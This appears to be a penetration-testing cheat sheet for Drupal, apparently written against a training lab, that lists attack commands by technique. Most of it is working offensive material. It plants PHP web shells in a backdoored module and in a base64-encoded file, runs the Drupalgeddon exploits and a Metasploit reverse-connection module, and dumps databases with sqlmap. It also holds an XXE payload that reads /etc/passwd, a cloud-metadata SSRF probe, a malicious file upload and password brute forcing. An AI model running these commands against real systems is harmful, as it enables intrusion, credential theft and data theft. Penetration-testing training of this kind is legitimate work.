1. PHP Filter Module Exploitation (Drupal < 8)
curl -s http://drupal-qa.inlanefreight.local/node/3?dcfdd5e021a869fcc6dfaef8bf31377e=id
Enable PHP filter module, inject code via content.
Consideration: Client communication before enabling modules.
2. Backdoored Module Upload
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' > captcha/shell.php
echo '<IfModule mod_rewrite.c>RewriteEngine On;RewriteBase /</IfModule>' > captcha/.htaccess
tar cvf captcha.tar.gz captcha/captcha/
curl -s drupal.inlanefreight.local/modules/captcha/shell.php?fe8edbabc5c5c9b7b764504cd22b17af=id
Upload malicious module via admin panel.
Consideration: Avoid modifying production systems without explicit permission.
3. Drupalgeddon (CVE-2014-3704)
python2.7 drupalgeddon.py -t http://drupal-qa.inlanefreight.local -u hacker -p pwnd
Create admin user via SQL injection.
Consideration: Impact of creating unauthorized admin accounts.
4. Drupalgeddon2 (CVE-2018-7600)
python3 drupalgeddon2.py
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee mrb3n.php
curl http://drupal-dev.inlanefreight.local/mrb3n.php?fe8edbabc5c5c9b7b764504cd22b17af=id
RCE via user registration form.
Consideration: Severity of unauthenticated RCE vulnerabilities.
5. Drupalgeddon3 (CVE-2018-7602)
msf6 > use exploit/multi/http/drupal_drupageddon3
msf6 > set rhosts 10.129.42.195
msf6 > set VHOST drupal-acc.inlanefreight.local
msf6 > set drupal_session SESS...
msf6 > set DRUPAL_NODE 1
msf6 > set LHOST 10.10.14.15
msf6 > exploit
RCE via Form API (requires authenticated session).
Consideration: Session hijacking risks.
6. Drupal Configuration File Exploitation/Security
curl -s http://drupal.inlanefreight.local/sites/default/settings.php
ls -l sites/default/settings.php
cat .htaccess
Check for exposed settings.php, extract database credentials.
Consideration: Secure configuration file permissions and access.
7. Database Exploitation (SQL Injection - Expanded)
curl "http://drupal.inlanefreight.local/node/1?id=1'--"
curl "http://drupal.inlanefreight.local/node/1?id=1' OR '1'='1"
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --dbs --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] --tables --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] --columns --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" -D [database_name] -T [table_name] -C [column1,column2] --dump --batch
sqlmap -u "http://drupal.inlanefreight.local/node/1?id=1" --level 5 --risk 3
Manual and automated SQL injection testing.
Consideration: Validate findings with alternative tools.
curl -X POST -d "param1=value1¶m2=payload" http://drupal.inlanefreight.local/form_path
Consideration: Burp Suite is very helpful for deeper analysis.
9. File Upload Vulnerabilities
curl -F "file=@malicious.php" http://drupal.inlanefreight.local/upload_path
Test various file extensions.
Consideration: Look for MIME type enforcement.
10. Access Control Vulnerabilities
curl -I http://drupal.inlanefreight.local/admin
Check for 200 response when not authenticated.
Consideration: Test different user roles.
11. Session Management Vulnerabilities
Use Burp Suite's Sequencer and Session handling rules.
12. XML External Entity (XXE) Injection
curl -X POST -H "Content-Type: application/xml" -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>' http://drupal.inlanefreight.local/xml_endpoint
13. Server-Side Request Forgery (SSRF)
curl "http://drupal.inlanefreight.local/page?url=http://169.254.169.254/latest/meta-data/"
Consideration: Check response for internal metadata leaks.
14. Drupal Brute Forcing
wpscan --url http://drupal.inlanefreight.local/ --enumerate u --passwords /usr/share/wordlists/rockyou.txt
hydra -l admin -P /usr/share/wordlists/rockyou.txt drupal.inlanefreight.local http-post-form "/user/login:name=^USER^&pass=^PASS^&form_id=user_login:Invalid username or password"
Consideration: Use specific tools for Drupal authentication mechanisms.
Additional Notes:
Ensure Drupal versions are known before testing specific exploits.
Use enumeration tools like droopescan for discovering modules and themes.
Test patches and mitigations post-exploitation to ensure security fixes.
